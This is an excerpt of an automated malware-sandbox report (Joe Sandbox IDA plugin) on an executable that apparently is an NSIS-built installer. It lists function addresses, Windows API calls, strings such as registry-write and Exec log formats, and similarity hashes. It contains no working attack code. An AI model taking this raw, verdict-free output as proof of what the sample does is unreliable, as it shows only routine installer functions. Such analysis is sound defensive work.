Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

NUL, xrefs: 00406A9E
F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43
[Rename], xrefs: 00406BC8, 00406BD7

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00022600,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
